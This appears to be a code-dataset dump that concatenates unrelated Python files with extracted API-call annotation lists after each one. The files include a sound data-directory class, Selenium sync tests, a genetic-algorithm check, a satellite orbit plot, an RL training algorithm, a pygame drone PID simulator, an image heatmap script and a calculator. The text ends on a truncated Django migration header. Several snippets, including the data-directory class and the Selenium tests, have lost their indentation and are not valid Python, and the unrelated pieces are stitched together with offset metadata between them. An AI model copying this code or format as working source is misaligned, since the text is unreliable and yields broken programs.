_classid = 'DataDir'
_classdescr = 'object for IO for disk-persistent sounds'
_version = get_versions()['version']
_suffix = '.snd'
_sndinfopath = 'sndinfo.json' # here goes required sound information
_metadatapath = 'metadata.json' # here goes extra information
def __init__(self, path, accessmode='r'):
BaseDataDir.__init__(self, path)
self._metadata = MetaData(self.path / self._metadatapath,
accessmode=accessmode)
@property
def metadata(self):
"""Dictionary-like access to disk based metadata.
Metadata items can be anything that can be saved in JSON format. If
there is no metadata, the metadata file does not exist, rather than
being empty. This saves a block of disk space (potentially 4kb)."""
return self._metadata
def read_sndinfo(self):
return self._read_jsondict(self._sndinfopath)
def write_sndinfo(self, d, overwrite=False):
self._write_jsondict(self._sndinfopath, d=d,
overwrite=overwrite)
self.read_sndinfo()
def create_datadir(path, overwrite=False):
dd = create_basedatadir(path=path,overwrite=overwrite)
return DataDir(dd.path)
| [
"darr.basedatadir.BaseDataDir.__init__",
"darr.basedatadir.create_basedatadir",
"darr.metadata.MetaData"
] | [((1376, 1426), 'darr.basedatadir.create_basedatadir', 'create_basedatadir', ([], {'path': 'path', 'overwrite': 'overwrite'}), '(path=path, overwrite=overwrite)\n', (1394, 1426), False, 'from darr.basedatadir import BaseDataDir, create_basedatadir\n'), ((537, 569), 'darr.basedatadir.BaseDataDir.__init__', 'BaseDataDir.__init__', (['self', 'path'], {}), '(self, path)\n', (557, 569), False, 'from darr.basedatadir import BaseDataDir, create_basedatadir\n'), ((595, 658), 'darr.metadata.MetaData', 'MetaData', (['(self.path / self._metadatapath)'], {'accessmode': 'accessmode'}), '(self.path / self._metadatapath, accessmode=accessmode)\n', (603, 658), False, 'from darr.metadata import MetaData\n')] |
###########################################################
# SELENIUM TESTS FOR PROCEDURE HARNESS
# to run: rm server_log.txt and client_log.txt from client logs directory
# launch client and server with stderr redirected to client_log.txt and server_log.txt
# run proc_harness_tests_automated.py
#
# Functionality tested:
# 1. New procedure created on server gets synched to file on client
# 2. Stable edit to any existing procedure gets synched to file on client
# 3. Unstable edit to any existing procedure DOES NOT get synched to file on client
###########################################################
import unittest
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import os
#from subprocess import Popen, PIPE
demo_time = 60
def login_helper(driver):
driver.get('http://127.0.0.1:8000/user/login')
email_element = driver.find_element_by_id("auth_user_email")
email_element.send_keys('<EMAIL>')
password_element = driver.find_element_by_id("auth_user_password")
password_element.send_keys('<PASSWORD>')
password_element.send_keys(Keys.ENTER)
print('Logged in and redirected to dashboard successfully')
class ProcHarnessTest(unittest.TestCase):
def setUp(self):
self.driver = webdriver.Chrome()
normalizedPath_c = os.path.abspath(os.getcwd() + "/../logs/client_log.txt")
normalizedPath_s = os.path.abspath(os.getcwd() + "/../logs/server_log.txt")
self.client_log = open(normalizedPath_c, "r")
self.server_log = open(normalizedPath_s, "r")
self.client_test_url = 'http://127.0.0.1:7999/test_proc_harness'
self.proc_dir = os.path.abspath(os.getcwd() + "/../applications/client/modules/procedures")
def test_clear_tables(self):
server = False
client = False
login_helper(self.driver)
self.driver.get(self.client_test_url + '/clear_tables')
for line in self.server_log.xreadlines():
if line.find("Server Table Cleared") != -1:
server = True
for line in self.client_log.xreadlines():
if line.find("Client Table Cleared") != -1:
client = True
self.assertTrue(server & client)
def test_new_proc(self):
new_proc = False
login_helper(self.driver)
self.driver.get(self.client_test_url + '/new_proc_test')
for line in self.server_log.xreadlines():
if line.find("look for proc_id and name:") != -1:
pieces = line.split()
new_proc_name = pieces[6]
dir_items = os.listdir(self.proc_dir)
if new_proc_name + ".py" in dir_items:
new_proc = True
self.assertTrue(new_proc)
def test_update_proc(self):
update_proc = False
login_helper(self.driver)
self.driver.get(self.client_test_url + '/update_proc_test')
for line in self.server_log.xreadlines():
if line.find("look for proc_id, name, data") != -1:
pieces = line.split()
proc_name = pieces[7]
data = pieces[8]
with open(self.proc_dir + "/" + proc_name + ".py") as file:
for line in file.readlines():
if line.find(data) != -1:
update_proc = True
self.assertTrue(update_proc)
def test_no_update_proc(self):
no_update_proc = False
login_helper(self.driver)
self.driver.get(self.client_test_url + '/not_update_proc_test')
for line in self.server_log.xreadlines():
if line.find("should not see data") != -1:
pieces = line.split()
proc_name = pieces[10]
data = pieces[5]
with open(self.proc_dir + "/" + proc_name + ".py") as file:
for line in file.readlines():
if line.find(data) != -1:
no_update_proc = True
self.assertFalse(no_update_proc)
def tearDown(self):
self.driver.quit()
self.client_log.close()
self.server_log.close()
if __name__ == '__main__':
unittest.main() | [
"unittest.main",
"selenium.webdriver.Chrome",
"os.listdir",
"os.getcwd"
] | [((4242, 4257), 'unittest.main', 'unittest.main', ([], {}), '()\n', (4255, 4257), False, 'import unittest\n'), ((1290, 1308), 'selenium.webdriver.Chrome', 'webdriver.Chrome', ([], {}), '()\n', (1306, 1308), False, 'from selenium import webdriver\n'), ((1353, 1364), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1362, 1364), False, 'import os\n'), ((1437, 1448), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1446, 1448), False, 'import os\n'), ((1701, 1712), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1710, 1712), False, 'import os\n'), ((2633, 2658), 'os.listdir', 'os.listdir', (['self.proc_dir'], {}), '(self.proc_dir)\n', (2643, 2658), False, 'import os\n')] |
""" Overall test for the PYGA framework"""
from src.ga import GA
import numpy as np
TEST_CONFIGURATION = {
"generation_size": 100,
"iterate_evolution": True,
"max_fitness": 0.99,
"display_info": False,
}
def give_score(weights) -> float:
""" Higher weights give higher fitness """
return np.mean(weights)
LOCAL_GA = GA(_num_weights=5, fitness_function=give_score)
LOCAL_GA.configure(TEST_CONFIGURATION)
for iteration in LOCAL_GA.evolve():
mean_value = np.mean(iteration)
print("Average fitness this generation:", mean_value)
assert mean_value >= 0.99
"""
had iterate_evolution been set to false,
instead of looping through LOCAL_GA.eolve()
we would've simple said
fittest_weights = LOCAL_GA.evolve()
"""
| [
"numpy.mean",
"src.ga.GA"
] | [((346, 393), 'src.ga.GA', 'GA', ([], {'_num_weights': '(5)', 'fitness_function': 'give_score'}), '(_num_weights=5, fitness_function=give_score)\n', (348, 393), False, 'from src.ga import GA\n'), ((316, 332), 'numpy.mean', 'np.mean', (['weights'], {}), '(weights)\n', (323, 332), True, 'import numpy as np\n'), ((487, 505), 'numpy.mean', 'np.mean', (['iteration'], {}), '(iteration)\n', (494, 505), True, 'import numpy as np\n')] |
import os
import matplotlib.pyplot as plt
from pytplot import get_data
from . import mms_load_mec
def mms_orbit_plot(trange=['2015-10-16', '2015-10-17'], probes=[1, 2, 3, 4], data_rate='srvy', xrange=None, yrange=None, plane='xy', coord='gse'):
spacecraft_colors = [(0,0,0), (213/255,94/255,0), (0,158/255,115/255), (86/255,180/255,233/255)]
mec_vars = mms_load_mec(trange=trange, data_rate=data_rate, probe=probes, varformat='*_r_' + coord, time_clip=True)
plane = plane.lower()
coord = coord.lower()
if plane not in ['xy', 'yz', 'xz']:
print('Error, invalid plane specified; valid options are: xy, yz, xz')
return
if coord not in ['eci', 'gsm', 'geo', 'sm', 'gse', 'gse2000']:
print('Error, invalid coordinate system specified; valid options are: eci, gsm, geo, sm, gse, gse2000')
return
if plane == 'xy':
plt.xlabel('X Position, Re')
plt.ylabel('Y Position, Re')
elif plane == 'yz':
plt.xlabel('Y Position, Re')
plt.ylabel('Z Position, Re')
elif plane == 'xz':
plt.xlabel('X Position, Re')
plt.ylabel('Z Position, Re')
km_in_re = 6371.2
plt.axes().set_aspect('equal')
im = plt.imread(os.path.dirname(os.path.realpath(__file__)) + '/mec/earth_polar1.png')
plt.imshow(im, extent=(-1, 1, -1, 1))
plot_count = 0
for probe in probes:
position_data = get_data('mms' + str(probe) + '_mec_r_' + coord)
if position_data is None:
print('No ' + data_rate + ' MEC data found for ' + 'MMS' + str(probe))
continue
else:
t, d = position_data
plot_count += 1
if plane == 'xy':
plt.plot(d[:, 0]/km_in_re, d[:, 1]/km_in_re, label='MMS' + str(probe), color=spacecraft_colors[int(probe)-1])
if plane == 'yz':
plt.plot(d[:, 1]/km_in_re, d[:, 2]/km_in_re, label='MMS' + str(probe), color=spacecraft_colors[int(probe)-1])
if plane == 'xz':
plt.plot(d[:, 0]/km_in_re, d[:, 2]/km_in_re, label='MMS' + str(probe), color=spacecraft_colors[int(probe)-1])
if plot_count > 0: # at least one plot created
plt.legend()
plt.title(trange[0] + ' to ' + trange[1])
plt.annotate(coord.upper() + ' coordinates', xy=(0.6, 0.05), xycoords='axes fraction')
plt.show()
| [
"matplotlib.pyplot.imshow",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"os.path.realpath",
"matplotlib.pyplot.axes",
"matplotlib.pyplot.title",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.show"
] | [((1300, 1337), 'matplotlib.pyplot.imshow', 'plt.imshow', (['im'], {'extent': '(-1, 1, -1, 1)'}), '(im, extent=(-1, 1, -1, 1))\n', (1310, 1337), True, 'import matplotlib.pyplot as plt\n'), ((883, 911), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""X Position, Re"""'], {}), "('X Position, Re')\n", (893, 911), True, 'import matplotlib.pyplot as plt\n'), ((920, 948), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Y Position, Re"""'], {}), "('Y Position, Re')\n", (930, 948), True, 'import matplotlib.pyplot as plt\n'), ((2174, 2186), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (2184, 2186), True, 'import matplotlib.pyplot as plt\n'), ((2195, 2236), 'matplotlib.pyplot.title', 'plt.title', (["(trange[0] + ' to ' + trange[1])"], {}), "(trange[0] + ' to ' + trange[1])\n", (2204, 2236), True, 'import matplotlib.pyplot as plt\n'), ((2341, 2351), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2349, 2351), True, 'import matplotlib.pyplot as plt\n'), ((981, 1009), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Y Position, Re"""'], {}), "('Y Position, Re')\n", (991, 1009), True, 'import matplotlib.pyplot as plt\n'), ((1018, 1046), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Z Position, Re"""'], {}), "('Z Position, Re')\n", (1028, 1046), True, 'import matplotlib.pyplot as plt\n'), ((1173, 1183), 'matplotlib.pyplot.axes', 'plt.axes', ([], {}), '()\n', (1181, 1183), True, 'import matplotlib.pyplot as plt\n'), ((1079, 1107), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""X Position, Re"""'], {}), "('X Position, Re')\n", (1089, 1107), True, 'import matplotlib.pyplot as plt\n'), ((1116, 1144), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Z Position, Re"""'], {}), "('Z Position, Re')\n", (1126, 1144), True, 'import matplotlib.pyplot as plt\n'), ((1241, 1267), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (1257, 1267), False, 'import os\n')] |
import os
from functools import lru_cache
import yaml
from cloudshell.recorder.rest.model import RestRequest, RestSession
class Configuration(object):
SESSION_KEY = 'Session'
RECORDS_KEY = 'Requests'
def __init__(self, config_path):
self._config_path = config_path
@property
@lru_cache()
def _config(self):
with open(self._config_path, 'r') as config:
return yaml.load(config)
def get_session(self):
return RestSession(**self._config.get(self.SESSION_KEY))
def get_requests(self):
table = []
for record_args in self._config.get(self.RECORDS_KEY):
table.append(RestRequest(**record_args))
return table
| [
"functools.lru_cache",
"yaml.load",
"cloudshell.recorder.rest.model.RestRequest"
] | [((310, 321), 'functools.lru_cache', 'lru_cache', ([], {}), '()\n', (319, 321), False, 'from functools import lru_cache\n'), ((417, 434), 'yaml.load', 'yaml.load', (['config'], {}), '(config)\n', (426, 434), False, 'import yaml\n'), ((664, 690), 'cloudshell.recorder.rest.model.RestRequest', 'RestRequest', ([], {}), '(**record_args)\n', (675, 690), False, 'from cloudshell.recorder.rest.model import RestRequest, RestSession\n')] |
import numpy
import torch
from torch_rl.algos.base import BaseAlgo
class I2Algorithm(BaseAlgo):
def __init__(self, environment_class, n_processes=16, seed=1, acmodel=None, num_frames_per_proc=None, discount=0.99,
lr=7e-4, gae_lambda=0.95, entropy_coef=0.01, value_loss_coef=0.5, max_grad_norm=0.5, recurrence=1,
rmsprop_alpha=0.99, rmsprop_eps=1e-5, preprocess_obss=None, reshape_reward=None):
num_frames_per_proc = num_frames_per_proc or 8
super().__init__(environment_class, acmodel, num_frames_per_proc, discount, lr, gae_lambda, entropy_coef,
value_loss_coef, max_grad_norm, recurrence, preprocess_obss, reshape_reward, n_processes, seed)
# self.optimizer = torch.optim.RMSprop(self.acmodel.parameters(), lr, alpha=rmsprop_alpha, eps=rmsprop_eps)
self.agent_optimizer = None
self.imagination_policy_optimizer = None
def load_acmodel(self, acmodel):
super().load_acmodel(acmodel)
self.agent_optimizer = torch.optim.RMSprop(self.acmodel.parameters(), self.lr, alpha=0.99, eps=1e-5)
self.imagination_policy_optimizer = torch.optim.Adam(self.acmodel.imagination_policy.parameters(), lr=self.lr)
def update_parameters(self):
# Collect experiences
exps, logs = self.collect_experiences()
# Initialize update values
update_entropy = 0
update_value = 0
update_policy_loss = 0
update_value_loss = 0
update_loss = 0
# Compute loss
dist, value = self.acmodel(exps.obs)
entropy = dist.entropy().mean()
policy_loss = -(dist.log_prob(exps.action) * exps.advantage).mean()
value_loss = (value - exps.returnn).pow(2).mean()
loss = policy_loss - self.entropy_coef * entropy + self.value_loss_coef * value_loss
# Update batch values
update_entropy += entropy.item()
update_value += value.mean().item()
update_policy_loss += policy_loss.item()
update_value_loss += value_loss.item()
update_loss += loss
# Update update values
update_entropy /= self.recurrence
update_value /= self.recurrence
update_policy_loss /= self.recurrence
update_value_loss /= self.recurrence
update_loss /= self.recurrence
# Update actor-critic
self.agent_optimizer.zero_grad()
update_loss.backward()
update_grad_norm = sum(p.grad.data.norm(2) ** 2 for p in self.acmodel.parameters()) ** 0.5
torch.nn.utils.clip_grad_norm_(self.acmodel.parameters(), self.max_grad_norm)
self.agent_optimizer.step()
self.imagination_policy_optimizer.zero_grad()
distilled_distributions, _, _ = self.acmodel.imagination_policy(exps.obs, None)
distillation_loss = (-1 * distilled_distributions.logits * dist.probs.detach()).sum(dim=1).mean()
distillation_loss.backward()
self.imagination_policy_optimizer.step()
# Log some values
logs["entropy"] = update_entropy
logs["value"] = update_value
logs["policy_loss"] = update_policy_loss
logs["value_loss"] = update_value_loss
logs["grad_norm"] = update_grad_norm
logs["distillation_loss"] = distillation_loss.item()
return logs
def _get_starting_indexes(self):
"""Gives the indexes of the observations given to the model and the
experiences used to compute the loss at first.
The indexes are the integers from 0 to `self.num_frames` with a step of
`self.recurrence`. If the model is not recurrent, they are all the
integers from 0 to `self.num_frames`.
Returns
-------
starting_indexes : list of int
the indexes of the experiences to be used at first
"""
starting_indexes = numpy.arange(0, self.num_frames, self.recurrence)
return starting_indexes
| [
"numpy.arange"
] | [((3872, 3921), 'numpy.arange', 'numpy.arange', (['(0)', 'self.num_frames', 'self.recurrence'], {}), '(0, self.num_frames, self.recurrence)\n', (3884, 3921), False, 'import numpy\n')] |
import pygame
from pygame.locals import *
from sys import exit
from PIL import Image
from PID import execute_PID
import numpy as np
# Global Variables
larg = 1000.0
alt = 640.0
global position_, angle_, velocidade
position_ = 0
angle_ = 0
velocidade = 0
class Screen:
def __init__(self, larg, alt, bg_image):
pygame.init()
# Set window's name
pygame.display.set_caption("Simulador 2D de Drone")
# Load background image
self.bg_image = bg_image
self.background = pygame.image.load('Imagens/Imagem_fundo_resized.jpg')
# Window's size
self.larg = larg
self.alt = alt
self.screen = pygame.display.set_mode((self.larg, self.alt))
def resize_screen_image(self):
# Resizing background image to match the screen size
image = Image.open(bg_image)
image = image.resize((self.larg, self.alt))
image.save('Imagens/Imagem_fundo_resized.jpg')
def plot(self, x, y):
self.screen.blit(x, y)
def update_screen(self):
# Screen configuration
self.screen.fill((0, 0, 0)) # Clean the last screen to update the frames
self.screen.blit(self.background, (0, 0)) # Load the bg at the (0, 0) position of the screen
# Fonte
fonte = pygame.font.SysFont('arial', 15, True, True)
# Destino
texto = f'Destino do drone: ({mx_real:.2f}, {my_real:.2f})'
texto_formatado = fonte.render(texto, True, (255, 255, 255))
self.screen.blit(texto_formatado, (10, 10))
# Posição Atual
texto = f'Posição atual: ({position_})'
texto_formatado = fonte.render(texto, True, (255, 255, 255))
self.screen.blit(texto_formatado, (10, 30))
# Velocidade Atual
texto = f'Velocidade atual: ({velocidade})'
texto_formatado = fonte.render(texto, True, (255, 255, 255))
self.screen.blit(texto_formatado, (10, 50))
# Angulo Atual
texto = f'Ângulo: {angle_:.2f}'
texto_formatado = fonte.render(texto, True, (255, 255, 255))
self.screen.blit(texto_formatado, (10, 70))
class Drone:
def __init__(self, position, angle, vel, drone_image):
# Drone's position, angle and velocity
self.position = position
self.posH = self.position[0]
self.posV = self.position[1]
self.angle = angle
self.vel = vel
# Load drone image
self.drone_image = drone_image
self.drone = pygame.image.load('Imagens/drone_resized.png')
self.tamX = self.drone.get_size()[0]
self.tamY = self.drone.get_size()[0]
self.height = 0, 0
# Get screen class
self.screen = Screen(larg, alt, None)
self.drone_rotated = self.drone
self.drone_rotated_pos = self.position
def resize_drone_image(self):
# Resizing player image
image = Image.open(drone_image)
image = image.resize((100, 50))
image.save('Imagens/drone_resized.png')
def drone_rotate(self, position, angle):
# Rotate drone
self.drone_rotated = pygame.transform.rotate(self.drone, angle)
# correcting drone's rotated position to the center of the drone's image
self.height = self.drone_rotated.get_height() / 2
self.drone_rotated_pos = (position[0] - self.drone_rotated.get_width() / 2, position[1] - self.height)
def drone_update(self, position, angle):
# Rotating drone
self.drone_rotate(position, angle)
# spawn drone
self.screen.plot(self.drone_rotated, self.drone_rotated_pos)
class Drone_Control:
def __init__(self, drone_image):
# Movement, position and rotation parameters
self.position = [500, 540]
self.posH = self.position[0]
self.posV = self.position[1]
self.vel = 10
self.angle = 0
self.drone = Drone(self.position, self.angle, self.vel, drone_image)
self.drone_rotated = self.drone.drone_rotated
# Screen to Real coordinates
self.real_pos = {'x': -(larg / 2 - self.posH), 'y': alt - 100 - self.posV}
# Screen limits (The screen size minus the player size)
self.xlim = larg - self.drone.tamX / 2
self.ylim = alt - self.drone.tamY / 2
self.keys = 0
# Initializing control parameters
self.w1 = 0
self.w2 = 0
self.v1 = 0
self.v2 = 0
self.ang_vel = 0
self.x = np.array([self.w1, self.w2,
self.real_pos['x'], self.real_pos['y'],
self.v1, self.v2,
self.angle * np.pi / 180.,
self.ang_vel * np.pi / 180.])
self.eP = np.array([1, 1]) # Position error
self.ePhi = 2 # angle error
def key_control(self):
self.keys = pygame.key.get_pressed()
self.real_pos = {'x': -(larg / 2 - self.posH), 'y': alt - 100 - self.posV}
destiny_x, destiny_y = self.real_pos['x'], self.real_pos['y']
if self.keys[pygame.K_LEFT] or self.keys[pygame.K_a]:
destiny_x = self.real_pos['x'] - 100.0
if self.keys[pygame.K_RIGHT] or self.keys[pygame.K_d]:
destiny_x = self.real_pos['x'] + 100.0
if self.keys[pygame.K_UP] or self.keys[pygame.K_w]:
destiny_y = self.real_pos['y'] + 100.0
if self.keys[pygame.K_DOWN] or self.keys[pygame.K_s]:
destiny_y = self.real_pos['y'] - 100.0
self.pid_control(destiny_x, destiny_y)
def mouse_control(self, destiny_x, destiny_y):
return self.pid_control(destiny_x, destiny_y)
def pid_control(self, destiny_x, destiny_y):
self.real_pos = {'x': -(larg / 2 - self.posH), 'y': alt - 100 - self.posV}
self.eP = np.array([destiny_x - self.real_pos['x'], destiny_y - self.real_pos['y']])
if np.abs(self.eP[0]) > 0.2 or np.abs(self.eP[1]) > 0.2 or np.abs(self.ePhi) > 0.1:
self.x, self.eP, self.ePhi = execute_PID(self.x, [destiny_x, destiny_y], t)
# Converting from real coordinate to screen coordinate
self.posH, self.posV = self.x[2] + larg / 2, alt - 100 - self.x[3]
# Updating state vector
self.angle = self.x[6]*180/np.pi
self.v1, self.v2 = self.x[4], self.x[5]
self.w1, self.w2 = self.x[0], self.x[1]
self.ang_vel = self.x[7]
# Updating drone's pixel position and angle
self.position = [self.posH, self.posV]
self.drone.drone_update(self.position, self.angle)
################ Printing drone's status
global position_, angle_, velocidade
position_ = (round(self.x[2], 2), round(self.x[3], 2))
angle_ = self.angle
velocidade = (round(self.v1, 2), round(self.v2, 2))
return True
else:
self.real_pos = {'x': -(larg / 2 - self.posH), 'y': alt - 100 - self.posV}
self.posH, self.posV = self.x[2] + larg / 2, alt - 100 - self.x[3]
self.eP = np.array([destiny_x - self.real_pos['x'], destiny_y - self.real_pos['y']])
self.drone.drone_update(self.position, self.angle)
return False
class Game:
def __init__(self, larg, alt, bg_image, drone_image):
self.screen = Screen(larg, alt, bg_image)
self.control = Drone_Control(drone_image)
self.clock = pygame.time.Clock()
self.ticks = 60
self.exit = False
def run(self):
global t, FPS
FPS = 600
auto_move = False
global mx_real, my_real
mx_real, my_real = 0, 0
while True:
self.clock.tick(FPS) # Game FPS
t = self.clock.get_time() / 1000
self.screen.update_screen()
for event in pygame.event.get():
# To quit the game
if event.type == QUIT:
pygame.quit()
exit()
if event.type == pygame.MOUSEBUTTONDOWN:
auto_move = True
# Get the destiny's position from mouse click
mx, my = pygame.mouse.get_pos()
# Transform the mouse click point in real coordinates
mx_real, my_real = -(larg / 2 - mx), alt - 100 - my
# print(mx_real, my_real)
if auto_move:
auto_move = self.control.mouse_control(mx_real, my_real)
else:
self.control.key_control()
pygame.display.update()
if __name__ == '__main__':
bg_image = 'Imagens/ghibli_background.jpg'
drone_image = 'Imagens/drone.png'
game = Game(larg, alt, bg_image, drone_image)
game.run()
| [
"numpy.abs",
"PIL.Image.open",
"sys.exit",
"pygame.init",
"pygame.quit",
"pygame.event.get",
"pygame.display.set_mode",
"pygame.mouse.get_pos",
"pygame.time.Clock",
"pygame.transform.rotate",
"numpy.array",
"pygame.key.get_pressed",
"pygame.display.set_caption",
"pygame.image.load",
"pyg... | [((315, 328), 'pygame.init', 'pygame.init', ([], {}), '()\n', (326, 328), False, 'import pygame\n'), ((353, 404), 'pygame.display.set_caption', 'pygame.display.set_caption', (['"""Simulador 2D de Drone"""'], {}), "('Simulador 2D de Drone')\n", (379, 404), False, 'import pygame\n'), ((478, 531), 'pygame.image.load', 'pygame.image.load', (['"""Imagens/Imagem_fundo_resized.jpg"""'], {}), "('Imagens/Imagem_fundo_resized.jpg')\n", (495, 531), False, 'import pygame\n'), ((602, 648), 'pygame.display.set_mode', 'pygame.display.set_mode', (['(self.larg, self.alt)'], {}), '((self.larg, self.alt))\n', (625, 648), False, 'import pygame\n'), ((747, 767), 'PIL.Image.open', 'Image.open', (['bg_image'], {}), '(bg_image)\n', (757, 767), False, 'from PIL import Image\n'), ((1164, 1208), 'pygame.font.SysFont', 'pygame.font.SysFont', (['"""arial"""', '(15)', '(True)', '(True)'], {}), "('arial', 15, True, True)\n", (1183, 1208), False, 'import pygame\n'), ((2222, 2268), 'pygame.image.load', 'pygame.image.load', (['"""Imagens/drone_resized.png"""'], {}), "('Imagens/drone_resized.png')\n", (2239, 2268), False, 'import pygame\n'), ((2574, 2597), 'PIL.Image.open', 'Image.open', (['drone_image'], {}), '(drone_image)\n', (2584, 2597), False, 'from PIL import Image\n'), ((2757, 2799), 'pygame.transform.rotate', 'pygame.transform.rotate', (['self.drone', 'angle'], {}), '(self.drone, angle)\n', (2780, 2799), False, 'import pygame\n'), ((3946, 4094), 'numpy.array', 'np.array', (["[self.w1, self.w2, self.real_pos['x'], self.real_pos['y'], self.v1, self.v2,\n self.angle * np.pi / 180.0, self.ang_vel * np.pi / 180.0]"], {}), "([self.w1, self.w2, self.real_pos['x'], self.real_pos['y'], self.v1,\n self.v2, self.angle * np.pi / 180.0, self.ang_vel * np.pi / 180.0])\n", (3954, 4094), True, 'import numpy as np\n'), ((4129, 4145), 'numpy.array', 'np.array', (['[1, 1]'], {}), '([1, 1])\n', (4137, 4145), True, 'import numpy as np\n'), ((4234, 4258), 'pygame.key.get_pressed', 'pygame.key.get_pressed', ([], {}), '()\n', (4256, 4258), False, 'import pygame\n'), ((5067, 5141), 'numpy.array', 'np.array', (["[destiny_x - self.real_pos['x'], destiny_y - self.real_pos['y']]"], {}), "([destiny_x - self.real_pos['x'], destiny_y - self.real_pos['y']])\n", (5075, 5141), True, 'import numpy as np\n'), ((6482, 6501), 'pygame.time.Clock', 'pygame.time.Clock', ([], {}), '()\n', (6499, 6501), False, 'import pygame\n'), ((5260, 5306), 'PID.execute_PID', 'execute_PID', (['self.x', '[destiny_x, destiny_y]', 't'], {}), '(self.x, [destiny_x, destiny_y], t)\n', (5271, 5306), False, 'from PID import execute_PID\n'), ((6163, 6237), 'numpy.array', 'np.array', (["[destiny_x - self.real_pos['x'], destiny_y - self.real_pos['y']]"], {}), "([destiny_x - self.real_pos['x'], destiny_y - self.real_pos['y']])\n", (6171, 6237), True, 'import numpy as np\n'), ((6793, 6811), 'pygame.event.get', 'pygame.event.get', ([], {}), '()\n', (6809, 6811), False, 'import pygame\n'), ((7325, 7348), 'pygame.display.update', 'pygame.display.update', ([], {}), '()\n', (7346, 7348), False, 'import pygame\n'), ((5147, 5165), 'numpy.abs', 'np.abs', (['self.eP[0]'], {}), '(self.eP[0])\n', (5153, 5165), True, 'import numpy as np\n'), ((5175, 5193), 'numpy.abs', 'np.abs', (['self.eP[1]'], {}), '(self.eP[1])\n', (5181, 5193), True, 'import numpy as np\n'), ((5203, 5220), 'numpy.abs', 'np.abs', (['self.ePhi'], {}), '(self.ePhi)\n', (5209, 5220), True, 'import numpy as np\n'), ((6868, 6881), 'pygame.quit', 'pygame.quit', ([], {}), '()\n', (6879, 6881), False, 'import pygame\n'), ((6887, 6893), 'sys.exit', 'exit', ([], {}), '()\n', (6891, 6893), False, 'from sys import exit\n'), ((7032, 7054), 'pygame.mouse.get_pos', 'pygame.mouse.get_pos', ([], {}), '()\n', (7052, 7054), False, 'import pygame\n')] |
import os
import math
import numpy as np
from skimage import transform, io
from PIL import Image
import os
Image.MAX_IMAGE_PIXELS = None
root_path = r'X:\test_image\output'
image_name = 'mask.tiff'
output_name = 'new_heatmap.tiff'
img_path = os.path.join(root_path, image_name)
output_path = os.path.join(root_path, output_name)
image = io.imread(img_path)[::2, ::2].astype('uint8')
heat_map = np.zeros(image.shape).astype('uint16')
h, w = image.shape
r = 20
index = 255 // (r + 1)
offset = 10
# for i in range(h):
# for j in range(w):
# if image[i, j] != 0:
# for m in range(-r, r):
# for n in range(-r, r):
# if 0 <= j + n < w and 0 <= i + m < h:
# distant = int((n ** 2 + m ** 2) ** 0.5)
# if distant <= r:
# distant = distant * index + offset
# if distant != 0:
# heat_map[i + m, j + n] += image[i, j] // distant
# else:
# heat_map[i, j] += image[i, j]
step = 50
for i in range(0, h, step):
for j in range(0, w, step):
heat_map[i:i + step, j:j + step] = image[i:i + step, j:j + step].sum()
if i % 1000 == 0:
print(i)
norm1 = heat_map / np.linalg.norm(heat_map).astype('uint8')
g_layer = np.zeros(image.shape).astype('uint8')
b_layer = np.zeros(image.shape).astype('uint8')
result = np.stack([norm1, g_layer, b_layer], axis=0).astype('uint8')
io.imsave(output_path, result)
print(result.shape)
| [
"os.path.join",
"numpy.stack",
"numpy.zeros",
"skimage.io.imread",
"skimage.io.imsave",
"numpy.linalg.norm"
] | [((244, 279), 'os.path.join', 'os.path.join', (['root_path', 'image_name'], {}), '(root_path, image_name)\n', (256, 279), False, 'import os\n'), ((294, 330), 'os.path.join', 'os.path.join', (['root_path', 'output_name'], {}), '(root_path, output_name)\n', (306, 330), False, 'import os\n'), ((1533, 1563), 'skimage.io.imsave', 'io.imsave', (['output_path', 'result'], {}), '(output_path, result)\n', (1542, 1563), False, 'from skimage import transform, io\n'), ((398, 419), 'numpy.zeros', 'np.zeros', (['image.shape'], {}), '(image.shape)\n', (406, 419), True, 'import numpy as np\n'), ((1378, 1399), 'numpy.zeros', 'np.zeros', (['image.shape'], {}), '(image.shape)\n', (1386, 1399), True, 'import numpy as np\n'), ((1426, 1447), 'numpy.zeros', 'np.zeros', (['image.shape'], {}), '(image.shape)\n', (1434, 1447), True, 'import numpy as np\n'), ((1473, 1516), 'numpy.stack', 'np.stack', (['[norm1, g_layer, b_layer]'], {'axis': '(0)'}), '([norm1, g_layer, b_layer], axis=0)\n', (1481, 1516), True, 'import numpy as np\n'), ((340, 359), 'skimage.io.imread', 'io.imread', (['img_path'], {}), '(img_path)\n', (349, 359), False, 'from skimage import transform, io\n'), ((1327, 1351), 'numpy.linalg.norm', 'np.linalg.norm', (['heat_map'], {}), '(heat_map)\n', (1341, 1351), True, 'import numpy as np\n')] |
from ClassCalculator import Calculator
class Main:
def get_input(self,message):
return input(message)
def menu(self):
t = True
while t:
m = "---Menu---\n"
m += "Escribe la abreviación adecuada\n"
m += "Suma: x mas y\nResta: x menos y\nMultiplicacion: x por y\nDivision: x entre y\n"
m += "Potencia: x elevado_a y\nRaiz: x raiz_de y\nPara salir escriba 'salir'\n\n"
inpt = self.get_input(m)
if inpt == 'Exit':
print("\nHasta pronto.")
t= False
else:
data = inpt.split(' ')
print("Resultado = "+ str(self.Calc(int(data[0]),data[1],int(data[2]))))
t = True
def Calc(self,a, oper, b):
X=Calculator(a,b)
switch={
'mas':X.suma,
'menos':X.resta,
'por':X.multi,
'entre':X.divi,
'elevado_a':X.pote,
'raiz_de':X.raiz
}
return switch.get(oper)()
Cycle = Main()
print(Cycle.menu()) | [
"ClassCalculator.Calculator"
] | [((803, 819), 'ClassCalculator.Calculator', 'Calculator', (['a', 'b'], {}), '(a, b)\n', (813, 819), False, 'from ClassCalculator import Calculator\n')] |
# Generated by Django 2.2.8 on 2019-12-19 03:54
